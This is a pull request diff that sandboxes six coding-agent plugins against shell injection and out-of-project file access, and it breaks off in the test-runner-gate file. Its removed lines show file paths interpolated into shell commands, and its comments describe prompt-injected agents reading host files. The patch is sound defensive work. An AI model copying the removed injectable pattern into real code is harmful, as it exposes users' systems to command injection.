### PR TITLE
fix(plugins): sandbox 6 plugins against shell/FS injection (shell-check, file-watcher, diff-summary, format-on-save, test-runner-gate, import-organizer)

### DIFF
--- a/packages/plugins/src/diff-summary/index.ts
+++ b/packages/plugins/src/diff-summary/index.ts
@@ -29,9 +29,31 @@
  * @public
  */
 import type { Plugin } from '@wrongstack/core';
-import { execSync } from 'node:child_process';
+import { execFileSync, execSync } from 'node:child_process';
+import { isAbsolute, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';
+
+// ---------------------------------------------------------------------------
+// Sandbox: reject file paths that resolve outside the project root.
+// diff-summary invokes `git diff` against whatever path the write/edit
+// tool passed. An absolute path outside the project would feed host FS
+// contents into the LLM context. Used to call `execSync` with a string
+// template — fine when path contains no shell metacharacters, brittle
+// when it does. Switch to execFileSync for argv-form git invocations so
+// filenames with spaces, double quotes, or shell metacharacters cannot
+// escape the command.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  if (typeof p !== 'string' || p.length === 0 || p.length > 4096) return false;
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
 
 // ---------------------------------------------------------------------------
 // Module-scope state (H1 audit pattern)
@@ -87,10 +109,14 @@ function readConfig(raw: unknown): DiffSummaryConfig {
   if (!raw || typeof raw !== 'object') return { ...DEFAULTS };
   const r = raw as Record<string, unknown>;
   return {
-    maxLines: typeof r['maxLines'] === 'number' && r['maxLines'] > 0 ? r['maxLines'] : DEFAULTS.maxLines,
+    maxLines:
+      typeof r['maxLines'] === 'number' && r['maxLines'] > 0 ? r['maxLines'] : DEFAULTS.maxLines,
     showStat: r['showStat'] !== false,
     mode: r['mode'] === 'stat' ? 'stat' : r['mode'] === 'off' ? 'off' : 'diff',
-    includeContext: typeof r['includeContext'] === 'number' && r['includeContext'] >= 0 ? r['includeContext'] : DEFAULTS.includeContext,
+    includeContext:
+      typeof r['includeContext'] === 'number' && r['includeContext'] >= 0
+        ? r['includeContext']
+        : DEFAULTS.includeContext,
   };
 }
 
@@ -121,13 +147,14 @@ function getGitDiff(filePath: string, contextLines: number, cwd?: string): DiffR
     encoding: 'utf-8' as const,
     timeout: 3_000,
     cwd,
-    stdio: ['pipe', 'pipe', 'pipe'] as ('pipe')[],
+    stdio: ['pipe', 'pipe', 'pipe'] as 'pipe'[],
   };
 
-  // First, check if the file is tracked by git.
+  // First, check if the file is tracked by git. execFileSync (argv) so a
+  // filePath with `"` or `;` cannot escape the command.
   let isTracked = false;
   try {
-    execSync(`git ls-files --error-unmatch "${filePath}"`, opts);
+    execFileSync('git', ['ls-files', '--error-unmatch', '--', filePath], opts);
     isTracked = true;
   } catch {
     isTracked = false;
@@ -137,12 +164,16 @@ function getGitDiff(filePath: string, contextLines: number, cwd?: string): DiffR
     let rawDiff: string;
     const contextFlag = `-U${contextLines}`;
     if (isTracked) {
-      // Standard diff for tracked files
-      rawDiff = execSync(`git diff ${contextFlag} -- "${filePath}"`, opts);
+      // Standard diff for tracked files — argv form, no shell interpolation.
+      rawDiff = execFileSync('git', ['diff', contextFlag, '--', filePath], opts);
     } else {
-      // New/untracked file — diff against /dev/null
+      // New/untracked file — diff against /dev/null.
       try {
-        rawDiff = execSync(`git diff --no-index ${contextFlag} /dev/null "${filePath}"`, opts);
+        rawDiff = execFileSync(
+          'git',
+          ['diff', '--no-index', contextFlag, '/dev/null', filePath],
+          opts,
+        );
       } catch (err: unknown) {
         // git diff --no-index exits 1 when there ARE differences (which is
         // what we want). stdout has the diff.
@@ -202,7 +233,8 @@ function buildDiffSummary(filePath: string, result: DiffResult, maxLines: number
 const plugin: Plugin = {
   name: 'diff-summary',
   version: '0.1.0',
-  description: 'PostToolUse hook that injects a compact git diff into the LLM context after every write or edit',
+  description:
+    'PostToolUse hook that injects a compact git diff into the LLM context after every write or edit',
   apiVersion: API_VERSION,
   capabilities: { tools: true, hooks: true },
   defaultConfig: { ...DEFAULTS },
@@ -224,13 +256,15 @@ const plugin: Plugin = {
         type: 'string',
         enum: ['diff', 'stat', 'off'],
         default: 'diff',
-        description: '"diff" injects unified diff; "stat" injects only +N -M counts; "off" disables the hook.',
+        description:
+          '"diff" injects unified diff; "stat" injects only +N -M counts; "off" disables the hook.',
       },
       includeContext: {
         type: 'number',
         minimum: 0,
         default: 3,
-        description: 'Context lines around each change (git -U<N>). 0 = compact (no surrounding lines), 3 = git default, higher = more orientation.',
+        description:
+          'Context lines around each change (git -U<N>). 0 = compact (no surrounding lines), 3 = git default, higher = more orientation.',
       },
     },
   },
@@ -263,6 +297,14 @@ const plugin: Plugin = {
 
       state.invocationCount += 1;
 
+      // Sandbox: refuse to diff a file outside the project root. Without
+      // this a prompt-injected write with an absolute host path could
+      // stream host-fs content into the LLM context.
+      if (!withinProject(filePath)) {
+        state.fallbackCount += 1;
+        return;
+      }
+
       const result = getGitDiff(filePath, cfg.includeContext, cwd);
       if (!result) {
         state.fallbackCount += 1;
@@ -289,9 +331,7 @@ const plugin: Plugin = {
         summary = buildDiffSummary(filePath, result, cfg.maxLines);
       }
 
-      const header = cfg.showStat
-        ? `\n📝 diff-summary (${toolName}): `
-        : '\n📝 diff-summary: ';
+      const header = cfg.showStat ? `\n📝 diff-summary (${toolName}): ` : '\n📝 diff-summary: ';
 
       return {
         additionalContext: header + summary,

--- a/packages/plugins/src/diff-summary/index.ts
+++ b/packages/plugins/src/diff-summary/index.ts
@@ -29,7 +29,7 @@
  * @public
  */
 import type { Plugin } from '@wrongstack/core';
-import { execFileSync, execSync } from 'node:child_process';
+import { execFileSync } from 'node:child_process';
 import { isAbsolute, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';

--- a/packages/plugins/src/file-watcher/index.ts
+++ b/packages/plugins/src/file-watcher/index.ts
@@ -8,9 +8,29 @@
  */
 import type { Plugin } from '@wrongstack/core';
 import { watch as fsWatch } from 'node:fs';
-import * as path from 'node:path';
+import { isAbsolute, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';
+
+// ---------------------------------------------------------------------------
+// Sandbox: reject paths that resolve outside the current working directory.
+// file-watcher opens native fs.FSWatcher handles on arbitrary paths and,
+// when autoIndex is on, escalates to codebase-index which then *reads*
+// those files. A tool caller (or prompt-injected LLM) could ask to watch
+// `$HOME`, /etc, C:\Windows, etc. and then have the watcher stream every
+// event into LLM context. Also harden indexProjectRoot the same way —
+// it's user-supplied and routes full-project reads.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  if (typeof p !== 'string' || p.length === 0 || p.length > 4096) return false;
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
 
 interface WatchHandle {
   id: string;
@@ -72,7 +92,8 @@ const plugin: Plugin = {
       autoIndex: {
         type: 'boolean',
         default: false,
-        description: 'When true, automatically reindex changed .ts/.tsx/.js/.jsx files via codebase-index (incremental)',
+        description:
+          'When true, automatically reindex changed .ts/.tsx/.js/.jsx files via codebase-index (incremental)',
       },
       indexProjectRoot: {
         type: 'string',
@@ -82,7 +103,8 @@ const plugin: Plugin = {
       depWatcher: {
         type: 'object',
         default: { enabled: false },
-        description: 'Bridge dependency file changes (package.json, go.mod, etc.) to the inter-agent mailbox for tech-stack audits. Requires the mailbox tool to be registered.',
+        description:
+          'Bridge dependency file changes (package.json, go.mod, etc.) to the inter-agent mailbox for tech-stack audits. Requires the mailbox tool to be registered.',
         properties: {
           enabled: { type: 'boolean', default: false },
           targetAgent: { type: 'string', default: 'tech-stack' },
@@ -109,24 +131,51 @@ const plugin: Plugin = {
     for (const t of debounceTimers.values()) clearTimeout(t);
     debounceTimers.clear();
 
-    const debounceMs = (api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.['debounceMs'] as number ?? 500;
+    const debounceMs =
+      ((api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.[
+        'debounceMs'
+      ] as number) ?? 500;
 
     function debounceEvent(key: string, fn: () => void, ms: number): void {
       const existing = debounceTimers.get(key);
       if (existing) clearTimeout(existing);
-      debounceTimers.set(key, setTimeout(() => {
-        debounceTimers.delete(key);
-        fn();
-      }, ms));
+      debounceTimers.set(
+        key,
+        setTimeout(() => {
+          debounceTimers.delete(key);
+          fn();
+        }, ms),
+      );
     }
 
-    const autoIndex = (api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.['autoIndex'] as boolean ?? false;
-    const indexProjectRoot = (api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.['indexProjectRoot'] as string ?? '';
+    const autoIndex =
+      ((api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.[
+        'autoIndex'
+      ] as boolean) ?? false;
+    const indexProjectRoot =
+      ((api.config.extensions?.['file-watcher'] as Record<string, unknown>)?.[
+        'indexProjectRoot'
+      ] as string) ?? '';
+    // Sandbox: the configured index root must live inside the project.
+    // An out-of-project value would route codebase-index reads anywhere
+    // on disk; ignore it and warn instead of trusting the config.
+    const safeIndexRoot =
+      indexProjectRoot !== '' && withinProject(indexProjectRoot) ? indexProjectRoot : '';
+    if (indexProjectRoot !== '' && safeIndexRoot === '') {
+      api.log.warn(
+        'file-watcher: indexProjectRoot is outside the project root — using watched dirPath instead',
+        {
+          indexProjectRoot,
+        },
+      );
+    }
 
     const INDEXABLE_EXTENSIONS = new Set(['.ts', '.tsx', '.js', '.jsx']);
 
     function isIndexableFile(filePath: string): boolean {
-      return INDEXABLE_EXTENSIONS.has(path.extname(filePath));
+      const dot = filePath.lastIndexOf('.');
+      const ext = dot >= 0 ? filePath.slice(dot).toLowerCase() : '';
+      return INDEXABLE_EXTENSIONS.has(ext);
     }
 
     function safeWatchDir(dirPath: string, recursive: boolean, handle: WatchHandle): void {
@@ -135,39 +184,47 @@ const plugin: Plugin = {
           if (!filename) return;
           const fullPath = `${dirPath}/${filename}`;
           const key = `${handle.id}:${fullPath}:${eventType}`;
-          debounceEvent(key, () => {
-            api.emitCustom('file-watcher:changed', {
-              watch_id: handle.id,
-              path: fullPath,
-              event: eventType,
-              filename,
-              timestamp: new Date().toISOString(),
-            });
-            api.metrics.counter('file_change', 1, { event: eventType ?? 'unknown' });
-            api.log.debug(`file-watcher: ${eventType} ${fullPath} (watch=${handle.id})`);
+          debounceEvent(
+            key,
+            () => {
+              api.emitCustom('file-watcher:changed', {
+                watch_id: handle.id,
+                path: fullPath,
+                event: eventType,
+                filename,
+                timestamp: new Date().toISOString(),
+              });
+              api.metrics.counter('file_change', 1, { event: eventType ?? 'unknown' });
+              api.log.debug(`file-watcher: ${eventType} ${fullPath} (watch=${handle.id})`);
 
-            if (autoIndex && isIndexableFile(fullPath)) {
-              debounceEvent(`index:${fullPath}`, async () => {
-                try {
-                  // Route through the background coordinator (mutex + watchdog +
-                  // circuit breaker) — a direct runIndexer call here used to race
-                  // the startup scan and per-edit reindexes on the same SQLite file.
-                  const { enqueueReindex } = await import('@wrongstack/tools/codebase-index');
-                  const root = indexProjectRoot || dirPath;
-                  enqueueReindex({
-                    projectRoot: root,
-                    files: [fullPath],
-                    onError: (err: unknown) =>
-                      api.log.warn(`file-watcher: auto-index failed for ${fullPath}: ${err}`),
-                  });
-                  api.metrics.counter('index_file', 1);
-                  api.log.debug(`file-watcher: auto-index scheduled for ${fullPath}`);
-                } catch (err) {
-                  api.log.warn(`file-watcher: auto-index failed for ${fullPath}: ${err}`);
-                }
-              }, debounceMs);
-            }
-          }, debounceMs);
+              if (autoIndex && isIndexableFile(fullPath)) {
+                debounceEvent(
+                  `index:${fullPath}`,
+                  async () => {
+                    try {
+                      // Route through the background coordinator (mutex + watchdog +
+                      // circuit breaker) — a direct runIndexer call here used to race
+                      // the startup scan and per-edit reindexes on the same SQLite file.
+                      const { enqueueReindex } = await import('@wrongstack/tools/codebase-index');
+                      const root = safeIndexRoot || dirPath;
+                      enqueueReindex({
+                        projectRoot: root,
+                        files: [fullPath],
+                        onError: (err: unknown) =>
+                          api.log.warn(`file-watcher: auto-index failed for ${fullPath}: ${err}`),
+                      });
+                      api.metrics.counter('index_file', 1);
+                      api.log.debug(`file-watcher: auto-index scheduled for ${fullPath}`);
+                    } catch (err) {
+                      api.log.warn(`file-watcher: auto-index failed for ${fullPath}: ${err}`);
+                    }
+                  },
+                  debounceMs,
+                );
+              }
+            },
+            debounceMs,
+          );
         });
 
         watcher.on('error', (err: unknown) => {
@@ -183,7 +240,8 @@ const plugin: Plugin = {
     // --- watch_start ---
     api.tools.register({
       name: 'watch_start',
-      description: 'Start watching one or more file paths for changes (add, change, delete). Returns a watch ID for stopping the watch later.',
+      description:
+        'Start watching one or more file paths for changes (add, change, delete). Returns a watch ID for stopping the watch later.',
       inputSchema: {
         type: 'object',
         properties: {
@@ -211,15 +269,36 @@ const plugin: Plugin = {
       mutating: false,
       async execute(input: Record<string, unknown>) {
         const rawPaths = input['paths'];
-        if (!rawPaths || (typeof rawPaths !== 'object') || !Array.isArray(rawPaths)) {
-          return { ok: false, error: 'paths must be an array of file/directory paths', watch_id: null };
+        if (!rawPaths || typeof rawPaths !== 'object' || !Array.isArray(rawPaths)) {
+          return {
+            ok: false,
+            error: 'paths must be an array of file/directory paths',
+            watch_id: null,
+          };
         }
         const paths = rawPaths as string[];
         if (paths.length === 0) {
-          return { ok: false, error: 'paths array is empty — provide at least one path', watch_id: null };
+          return {
+            ok: false,
+            error: 'paths array is empty — provide at least one path',
+            watch_id: null,
+          };
         }
         const events = (input['events'] as string[] | undefined) ?? ['change', 'add', 'delete'];
         const recursive = (input['recursive'] as boolean | undefined) ?? true;
+
+        // Sandbox: every requested path must resolve inside the project
+        // root. Reject the whole call early otherwise — half-attaching
+        // some watchers would silently leave unsafe paths unmonitored.
+        const bad = paths.find((p) => !withinProject(p));
+        if (bad !== undefined) {
+          return {
+            ok: false,
+            error: `path is outside the project root: ${bad}`,
+            watch_id: null,
+            rejectedOutsideProject: true,
+          };
+        }
 
         const id = nextId();
         const handle: WatchHandle = {
@@ -293,7 +372,8 @@ const plugin: Plugin = {
     // --- watch_list ---
     api.tools.register({
       name: 'watch_list',
-      description: 'List all currently active file watches with their IDs, paths, and creation times.',
+      description:
+        'List all currently active file watches with their IDs, paths, and creation times.',
       inputSchema: { type: 'object', properties: {} },
       permission: 'auto',
       mutating: false,

--- a/packages/plugins/src/format-on-save/index.ts
+++ b/packages/plugins/src/format-on-save/index.ts
@@ -28,10 +28,30 @@
  * @public
  */
 import type { Plugin } from '@wrongstack/core';
-import { execSync } from 'node:child_process';
+import { execFileSync, execSync } from 'node:child_process';
 import { existsSync, statSync } from 'node:fs';
+import { isAbsolute, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';
+
+// ---------------------------------------------------------------------------
+// Sandbox: reject file paths outside the project root, plus switch the
+// `npx biome` shell form to execFileSync argv form. format-on-save runs
+// after every write/edit; a prompt-injected write with an absolute host
+// path would have `npx biome format --write "C:\Windows\evil.txt"`
+// interpolated into a shell — quoting is brittle and Windows quotes can
+// be escaped.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  if (typeof p !== 'string' || p.length === 0 || p.length > 4096) return false;
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
 
 // ---------------------------------------------------------------------------
 // Module-scope state (H1 audit pattern)
@@ -77,7 +97,10 @@ function readConfig(raw: unknown): FormatOnSaveConfig {
   const r = raw as Record<string, unknown>;
   return {
     enabled: r['enabled'] !== false,
-    timeoutMs: typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0 ? r['timeoutMs'] : DEFAULTS.timeoutMs,
+    timeoutMs:
+      typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0
+        ? r['timeoutMs']
+        : DEFAULTS.timeoutMs,
   };
 }
 
@@ -97,6 +120,10 @@ interface FormatResult {
  * failed or the file doesn't exist.
  */
 function formatFile(filePath: string, timeoutMs: number): FormatResult | null {
+  // Sandbox: refuse to format files outside the project root before we
+  // spawn biome. Without this guard a host-FS file could be written or
+  // diffed through the formatter call.
+  if (!withinProject(filePath)) return null;
   if (!existsSync(filePath)) return null;
 
   let bytesBefore: number;
@@ -107,7 +134,7 @@ function formatFile(filePath: string, timeoutMs: number): FormatResult | null {
   }
 
   try {
-    execSync(`npx biome format --write "${filePath}"`, {
+    execFileSync('npx', ['biome', 'format', '--write', filePath], {
       encoding: 'utf-8',
       timeout: timeoutMs,
       cwd: process.cwd(),
@@ -142,7 +169,7 @@ function formatFile(filePath: string, timeoutMs: number): FormatResult | null {
   // We can't compare pre/post without a snapshot, so we re-run biome
   // in check mode: if it exits 0, the file is already formatted.
   try {
-    execSync(`npx biome format "${filePath}"`, {
+    execFileSync('npx', ['biome', 'format', filePath], {
       encoding: 'utf-8',
       timeout: timeoutMs,
       cwd: process.cwd(),
@@ -165,7 +192,8 @@ function formatFile(filePath: string, timeoutMs: number): FormatResult | null {
 const plugin: Plugin = {
   name: 'format-on-save',
   version: '0.1.0',
-  description: 'PostToolUse hook that runs biome format --write on the file after every write or edit',
+  description:
+    'PostToolUse hook that runs biome format --write on the file after every write or edit',
   apiVersion: API_VERSION,
   capabilities: { tools: true, hooks: true },
   defaultConfig: { ...DEFAULTS },

--- a/packages/plugins/src/import-organizer/index.ts
+++ b/packages/plugins/src/import-organizer/index.ts
@@ -47,6 +47,58 @@
 import type { Plugin } from '@wrongstack/core';
 import { spawn } from 'node:child_process';
 import { existsSync, statSync } from 'node:fs';
+import { basename, isAbsolute, relative, resolve } from 'node:path';
+
+// ---------------------------------------------------------------------------
+// Sandbox + command allowlist. import-organizer already uses spawn() with
+// argv (no shell interpolation), so file paths cannot break out of the
+// command. The remaining risk: the `command` config field lets a config-
+// writer set an arbitrary first token, which spawn will execute directly.
+// Lock down that first token to a known set of linter binaries.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  if (typeof p !== 'string' || p.length === 0 || p.length > 4096) return false;
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
+
+const ALLOWED_FIRST_TOKENS = new Set<string>([
+  'npx',
+  'pnpm',
+  'npm',
+  'yarn',
+  'biome',
+  '@biomejs/biome',
+  'eslint',
+  'node',
+  // Recognise a fully-qualified project-local path like
+  // "./node_modules/.bin/biome"; basename check kicks in below.
+]);
+
+function resolveAllowedCommand(command: string): { cmd: string; args: string[] } | null {
+  const tokens = command.split(/\s+/).filter(Boolean);
+  if (tokens.length === 0) return null;
+  const head = tokens[0]!;
+  if (ALLOWED_FIRST_TOKENS.has(head)) {
+    return { cmd: head, args: tokens.slice(1) };
+  }
+  if (isAbsolute(head)) {
+    if (!withinProject(head)) return null;
+    const base = basename(head);
+    if (ALLOWED_FIRST_TOKENS.has(base)) return { cmd: head, args: tokens.slice(1) };
+  }
+  // Allow relative paths under project root (./node_modules/.bin/biome).
+  if (!isAbsolute(head) && withinProject(head)) {
+    const base = basename(head);
+    if (ALLOWED_FIRST_TOKENS.has(base)) return { cmd: head, args: tokens.slice(1) };
+  }
+  return null;
+}
 
 // ---------------------------------------------------------------------------
 // Constants
@@ -118,13 +170,16 @@ function readConfig(raw: unknown): ImportOrganizerConfig {
   const r = raw as Record<string, unknown>;
   return {
     enabled: r['enabled'] !== false,
-    command: typeof r['command'] === 'string' && r['command'].length > 0 ? r['command'] : DEFAULTS.command,
+    command:
+      typeof r['command'] === 'string' && r['command'].length > 0 ? r['command'] : DEFAULTS.command,
     fallbackCommand:
       typeof r['fallbackCommand'] === 'string' && r['fallbackCommand'].length > 0
         ? r['fallbackCommand']
         : DEFAULTS.fallbackCommand,
     timeoutMs:
-      typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0 ? r['timeoutMs'] : DEFAULTS.timeoutMs,
+      typeof r['timeoutMs'] === 'number' && r['timeoutMs'] > 0
+        ? r['timeoutMs']
+        : DEFAULTS.timeoutMs,
   };
 }
 
@@ -144,7 +199,12 @@ interface SpawnResult {
  * via AbortSignal. Uses `spawn` (not `execSync`) so the caller can mock
  * it from tests without spawning real processes.
  */
-function runCommand(command: string, args: string[], timeoutMs: number, cwd: string): Promise<SpawnResult> {
+function runCommand(
+  command: string,
+  args: string[],
+  timeoutMs: number,
+  cwd: string,
+): Promise<SpawnResult> {
   return new Promise((resolve) => {
     let timedOut = false;
     const stdoutChunks: Buffer[] = [];
@@ -202,6 +262,10 @@ async function organizeImports(
   cfg: ImportOrganizerConfig,
   cwd: string,
 ): Promise<OrganizeResult | null> {
+  // Sandbox: refuse to lint files outside the project root. Without
+  // this guard a prompt-injected write/edit with a host-FS path could
+  // pivot the linter into reading and rewriting arbitrary files.
+  if (!withinProject(filePath)) return null;
   if (!existsSync(filePath)) return null;
 
   let bytesBefore: number;
@@ -211,17 +275,21 @@ async function organizeImports(
     return null;
   }
 
-  const primary = cfg.command.split(/\s+/).filter(Boolean);
-  if (primary.length === 0) return null;
-  const [primaryCmd, ...primaryArgs] = primary as [string, ...string[]];
+  // Command allowlist: the primary command's first token must resolve
+  // to a known linter. Without this guard, a config-supplied `command`
+  // would let an attacker pivot the post-save hook into spawning
+  // arbitrary processes.
+  const primary = resolveAllowedCommand(cfg.command);
+  if (!primary) return null;
+  const [primaryCmd, ...primaryArgs] = [primary.cmd, ...primary.args] as [string, ...string[]];
 
   let result = await runCommand(primaryCmd, [...primaryArgs, filePath], cfg.timeoutMs, cwd);
   let usedCommand = cfg.command;
 
   if (result.code === 127 && cfg.fallbackCommand) {
-    const fallback = cfg.fallbackCommand.split(/\s+/).filter(Boolean);
-    if (fallback.length > 0) {
-      const [fbCmd, ...fbArgs] = fallback as [string, ...string[]];
+    const fallback = resolveAllowedCommand(cfg.fallbackCommand);
+    if (fallback) {
+      const [fbCmd, ...fbArgs] = [fallback.cmd, ...fallback.args] as [string, ...string[]];
       result = await runCommand(fbCmd, [...fbArgs, filePath], cfg.timeoutMs, cwd);
       usedCommand = cfg.fallbackCommand;
     }
@@ -253,7 +321,8 @@ async function organizeImports(
 const plugin: Plugin = {
   name: 'import-organizer',
   version: '0.1.0',
-  description: 'PostToolUse hook that re-sorts and de-duplicates imports in a file after every write or edit',
+  description:
+    'PostToolUse hook that re-sorts and de-duplicates imports in a file after every write or edit',
   apiVersion: API_VERSION,
   capabilities: { tools: true, hooks: true },
   defaultConfig: { ...DEFAULTS },
@@ -268,12 +337,14 @@ const plugin: Plugin = {
       command: {
         type: 'string',
         default: DEFAULTS.command,
-        description: 'Primary linter command. Use the `--write` (or `--fix`) flag and biome-specific `--unsafe` so import organization runs.',
+        description:
+          'Primary linter command. Use the `--write` (or `--fix`) flag and biome-specific `--unsafe` so import organization runs.',
       },
       fallbackCommand: {
         type: 'string',
         default: DEFAULTS.fallbackCommand,
-        description: 'Fallback command (e.g. `eslint --fix`) used when the primary linter is not installed.',
+        description:
+          'Fallback command (e.g. `eslint --fix`) used when the primary linter is not installed.',
       },
       timeoutMs: {
         type: 'number',
@@ -323,7 +394,9 @@ const plugin: Plugin = {
         if (!state.linterAvailable) {
           state.linterAvailable = false; // first probe failed
           state.probeComplete = true;
-          api.log.warn('import-organizer: no linter available — hook will be a no-op for the rest of the session');
+          api.log.warn(
+            'import-organizer: no linter available — hook will be a no-op for the rest of the session',
+          );
         }
         state.errorCount += 1;
         return;
@@ -360,8 +433,7 @@ const plugin: Plugin = {
       // Don't surface anything when nothing changed — keeps the context window clean.
       if (result.stderr.trim().length > 0) {
         return {
-          additionalContext:
-            `\n📦 import-organizer: '${filePath}' was already clean, but the linter reported:\n${result.stderr.trim()}`,
+          additionalContext: `\n📦 import-organizer: '${filePath}' was already clean, but the linter reported:\n${result.stderr.trim()}`,
         };
       }
       return;

--- a/packages/plugins/src/shell-check/index.ts
+++ b/packages/plugins/src/shell-check/index.ts
@@ -11,9 +11,32 @@
 import type { Plugin } from '@wrongstack/core';
 import { execFileSync, execSync } from 'node:child_process';
 import { existsSync, readdirSync } from 'node:fs';
-import { join } from 'node:path';
+import { isAbsolute, join, relative, resolve } from 'node:path';
 
 const API_VERSION = '^0.1.10';
+
+// ---------------------------------------------------------------------------
+// Sandbox: reject paths that resolve outside the current working directory.
+// shell-check is a recursive file-lister over arbitrary directories — it
+// must not let a tool caller (or a prompt-injected LLM) sweep the host
+// filesystem, exfiltrate script contents, or expose /etc, $HOME or
+// C:\Windows to the linter. The check is absolute-path resolution + a
+// `relative()` that must not start with `..` or be absolute.
+// ---------------------------------------------------------------------------
+function withinProject(p: string): boolean {
+  const root = process.cwd();
+  const resolved = isAbsolute(p) ? resolve(p) : resolve(root, p);
+  const rel = relative(root, resolved);
+  if (rel === '' || rel === '.') return true;
+  if (rel.startsWith('..')) return false;
+  if (isAbsolute(rel)) return false;
+  return true;
+}
+
+// Length cap matched to the schema description (filenames) and arbitrary
+// user-supplied paths via tool input — prevents absurd inputs from
+// blowing up `readdirSync` recursion.
+const MAX_PATH_LEN = 4096;
 
 // ---------------------------------------------------------------------------
 // Module-scope state (H1 audit pattern: shared between setup, teardown,
@@ -62,7 +85,9 @@ function runShellCheck(
     try {
       execSync('shellcheck --version', { encoding: 'utf-8', stdio: 'ignore', windowsHide: true });
     } catch {
-      throw new Error('shellcheck is not installed. Install via: apt install shellcheck / brew install shellcheck');
+      throw new Error(
+        'shellcheck is not installed. Install via: apt install shellcheck / brew install shellcheck',
+      );
     }
   }
 
@@ -149,7 +174,8 @@ function findShellFiles(dir: string, pattern: string): string[] {
 const plugin: Plugin = {
   name: 'shell-check',
   version: '0.2.0',
-  description: 'Runs shellcheck analysis on bash/shell scripts and surfaces issues with severity levels',
+  description:
+    'Runs shellcheck analysis on bash/shell scripts and surfaces issues with severity levels',
   apiVersion: API_VERSION,
   capabilities: { tools: true, pipelines: ['toolCall'] },
   defaultConfig: {
@@ -162,7 +188,11 @@ const plugin: Plugin = {
     type: 'object',
     properties: {
       severity: { type: 'string', enum: ['error', 'warning', 'info', 'style'], default: 'warning' },
-      severityThreshold: { type: 'string', enum: ['error', 'warning', 'info', 'style'], default: 'warning' },
+      severityThreshold: {
+        type: 'string',
+        enum: ['error', 'warning', 'info', 'style'],
+        default: 'warning',
+      },
       ignoredCodes: { type: 'array', items: { type: 'string' }, default: [] },
       autoScanOnBash: { type: 'boolean', default: false },
     },
@@ -192,12 +222,14 @@ const plugin: Plugin = {
           directory: {
             type: 'string',
             default: '.',
-            description: 'Directory to recursively scan for .sh files. Used when `files` is omitted.',
+            description:
+              'Directory to recursively scan for .sh files. Used when `files` is omitted.',
           },
           pattern: {
             type: 'string',
             default: '',
-            description: 'Filename pattern to match when scanning a directory (default: all .sh files).',
+            description:
+              'Filename pattern to match when scanning a directory (default: all .sh files).',
           },
           severity: {
             type: 'string',
@@ -221,12 +253,42 @@ const plugin: Plugin = {
         // answer "what was the last lint?" — failed runs (empty
         // file list, runShellCheck threw) are still counted because
         // the operator wants to see activity.
-        const inp = input as { files?: string[]; directory?: string; pattern?: string; severity?: ShellCheckIssue['level'] };
+        const inp = input as {
+          files?: string[];
+          directory?: string;
+          pattern?: string;
+          severity?: ShellCheckIssue['level'];
+        };
         const files = inp.files;
         const directory = inp.directory ?? '.';
         const pattern = inp.pattern ?? '';
         const severity = inp.severity ?? 'warning';
         state.invocationCount += 1;
+
+        // Sandbox: confine any user-supplied path to the project root
+        // before it touches the filesystem or the external shellcheck
+        // binary. Without this guard a tool caller (or a prompt-
+        // injected LLM) could sweep /etc, $HOME, C:\Windows, etc.
+        const pathIsSafe = (p: string): boolean =>
+          typeof p === 'string' && p.length > 0 && p.length <= MAX_PATH_LEN && withinProject(p);
+        if (!pathIsSafe(directory)) {
+          return {
+            ok: false,
+            error: `directory path is outside the project root: ${directory}`,
+            issues: [],
+            filesScanned: 0,
+            rejectedOutsideProject: true,
+          };
+        }
+        if (files && files.some((f) => !pathIsSafe(f))) {
+          return {
+            ok: false,
+            error: 'one or more file paths are outside the project root',
+            issues: [],
+            filesScanned: 0,
+            rejectedOutsideProject: true,
+          };
+        }
 
         // Resolve the file list: explicit files, or recursive directory scan.
         let checkFiles: string[];
@@ -303,11 +365,12 @@ const plugin: Plugin = {
             style: styleCount,
           },
           byFile,
-          recommendation: errorCount > 0
-            ? 'Fix errors before deploying.'
-            : warningCount > 0
-              ? 'Review and fix warnings for better script quality.'
-              : 'No issues found.',
+          recommendation:
+            errorCount > 0
+              ? 'Fix errors before deploying.'
+              : warningCount > 0
+                ? 'Review and fix warnings for better script quality.'
+                : 'No issues found.',
         };
       },
     });

--- a/packages/plugins/src/shell-check/index.ts
+++ b/packages/plugins/src/shell-check/index.ts
@@ -280,7 +280,7 @@ const plugin: Plugin = {
             rejectedOutsideProject: true,
           };
         }
-        if (files && files.some((f) => !pathIsSafe(f))) {
+        if (files?.some((f) => !pathIsSafe(f))) {
           return {
             ok: false,
             error: 'one or more file paths are outside the project root',

--- a/packages/plugins/src/test-runner-gate/index.ts
+++ b/packages/plugins/src/test-runner-gate/index.ts
@@ -30,9 +30,9 @@
  * @public
  */
 import type { Plugin } from '@wrongstack/core';
-import { execSync } from 'node:child_process';
+import { execFileSync, execSync } from 'node:child_process';
